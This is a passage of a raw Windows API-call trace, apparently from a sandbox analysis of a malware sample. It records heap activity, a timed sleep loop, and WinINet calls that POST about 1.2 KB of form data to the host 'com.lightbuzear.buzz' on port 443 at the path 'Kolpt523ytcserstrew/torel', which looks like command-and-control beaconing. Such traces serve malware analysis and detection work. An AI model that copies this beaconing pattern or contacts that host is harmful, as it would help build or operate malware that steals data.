0x480b5d0 [0240.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815ab8 | out: hHeap=0x4780000) returned 1 [0240.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830688 [0240.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0240.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0240.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830688 | out: hHeap=0x4780000) returned 1 [0240.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830700 [0240.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba58 [0240.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48308e0 [0240.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0240.301] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0240.301] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0240.301] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0240.302] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48308e0 | out: hHeap=0x4780000) returned 1 [0240.302] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0240.302] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5b0 [0240.302] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6f0 [0240.302] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0240.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0240.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0240.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0240.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0240.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0240.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0240.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815818 [0240.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0240.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815938 [0240.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815818 | out: hHeap=0x4780000) returned 1 [0240.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0240.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815938 | out: hHeap=0x4780000) returned 1 [0240.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48306d8 [0240.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0240.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0240.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48306d8 | out: hHeap=0x4780000) returned 1 [0240.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48306d8 [0240.304] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0240.304] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830688 [0240.304] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0240.304] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0240.305] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0240.305] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0240.305] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830688 | out: hHeap=0x4780000) returned 1 [0240.305] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0240.306] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0240.306] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0240.306] FreeLibrary (hLibModule=0x71570000) returned 1 [0240.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0240.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0240.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830570 | out: hHeap=0x4780000) returned 1 [0240.307] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830868 | out: hHeap=0x4780000) returned 1 [0240.307] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830548 | out: hHeap=0x4780000) returned 1 [0240.310] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0240.310] Sleep (dwMilliseconds=0x2710) [0240.332] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0240.332] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0240.332] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0240.332] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce680 [0240.332] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0240.332] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5c0 [0240.333] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0240.333] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce640 [0240.333] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0240.333] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815830 [0240.333] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0240.333] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48158f0 [0240.333] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815830 | out: hHeap=0x4780000) returned 1 [0240.333] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0240.333] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48158f0 | out: hHeap=0x4780000) returned 1 [0240.333] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x48159f8 [0240.333] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0240.333] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0240.333] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0240.333] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0240.334] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0240.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0240.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0240.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0240.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0240.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0240.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0240.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0240.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0240.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0240.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815908 [0240.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0240.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815818 [0240.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815908 | out: hHeap=0x4780000) returned 1 [0240.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0240.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815818 | out: hHeap=0x4780000) returned 1 [0240.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830868 [0240.335] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0240.335] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd30 [0240.335] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830868 | out: hHeap=0x4780000) returned 1 [0240.335] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830688 [0240.335] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0240.335] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830750 [0240.335] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0240.336] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0240.336] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0240.336] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0240.336] FreeLibrary (hLibModule=0x71780000) returned 1 [0240.336] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830750 | out: hHeap=0x4780000) returned 1 [0240.336] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0240.337] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48306b0 [0240.337] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0240.337] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0240.337] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0240.337] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0240.337] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce680 [0240.337] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0240.337] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0240.337] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0240.337] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0240.337] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0240.337] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48158c0 [0240.337] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0240.337] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48159c8 [0240.337] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48158c0 | out: hHeap=0x4780000) returned 1 [0240.337] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0240.337] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159c8 | out: hHeap=0x4780000) returned 1 [0240.337] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815920 [0240.338] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830570 [0240.338] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830570 | out: hHeap=0x4780000) returned 1 [0240.338] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0240.338] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830868 [0240.338] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0240.346] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830750 [0240.346] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0240.346] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0240.346] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0240.346] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0240.346] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0240.346] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0240.346] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0240.346] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0240.346] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0240.346] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815848 [0240.347] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0240.347] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815a40 [0240.347] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815848 | out: hHeap=0x4780000) returned 1 [0240.347] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0240.347] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a40 | out: hHeap=0x4780000) returned 1 [0240.347] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x48158c0 [0240.347] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830548 [0240.347] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830548 | out: hHeap=0x4780000) returned 1 [0240.347] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0240.347] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0240.348] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0240.348] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0240.348] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0240.348] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0240.348] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0240.348] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0240.348] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0240.348] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0240.349] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0240.349] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815a58 [0240.349] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0240.349] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815ae8 [0240.349] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a58 | out: hHeap=0x4780000) returned 1 [0240.349] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0240.349] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815ae8 | out: hHeap=0x4780000) returned 1 [0240.349] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830548 [0240.349] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0240.349] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0240.349] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830548 | out: hHeap=0x4780000) returned 1 [0240.349] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830778 [0240.349] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0240.349] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830548 [0240.350] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0240.350] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0240.350] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0240.350] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0240.351] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830548 | out: hHeap=0x4780000) returned 1 [0240.351] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0240.351] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0240.351] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0240.351] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0240.351] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0240.351] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0240.351] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0240.351] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0240.352] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0240.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815a28 [0240.352] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0240.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815a10 [0240.352] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a28 | out: hHeap=0x4780000) returned 1 [0240.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0240.352] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a10 | out: hHeap=0x4780000) returned 1 [0240.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48308e0 [0240.352] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0240.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0240.352] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48308e0 | out: hHeap=0x4780000) returned 1 [0240.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830548 [0240.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0240.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48308e0 [0240.353] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0240.353] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0240.353] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0240.353] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0242.126] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48308e0 | out: hHeap=0x4780000) returned 1 [0242.126] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0242.126] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0242.126] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0242.127] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0242.127] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6b0 [0242.127] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0242.127] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0242.127] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0242.127] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0242.127] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0242.127] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0242.127] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0242.127] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48158f0 [0242.127] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0242.127] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815818 [0242.127] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48158f0 | out: hHeap=0x4780000) returned 1 [0242.127] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0242.127] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815818 | out: hHeap=0x4780000) returned 1 [0242.127] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830570 [0242.127] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0242.127] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0242.127] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830570 | out: hHeap=0x4780000) returned 1 [0242.127] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830570 [0242.127] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb8d0 [0242.128] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48308e0 [0242.128] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0242.128] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0242.129] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0242.129] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0242.129] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48308e0 | out: hHeap=0x4780000) returned 1 [0242.130] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0242.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0242.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0242.130] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0242.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0242.131] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0242.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0242.131] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0242.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0242.131] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0242.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815908 [0242.131] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0242.131] RtlAllocateHeap 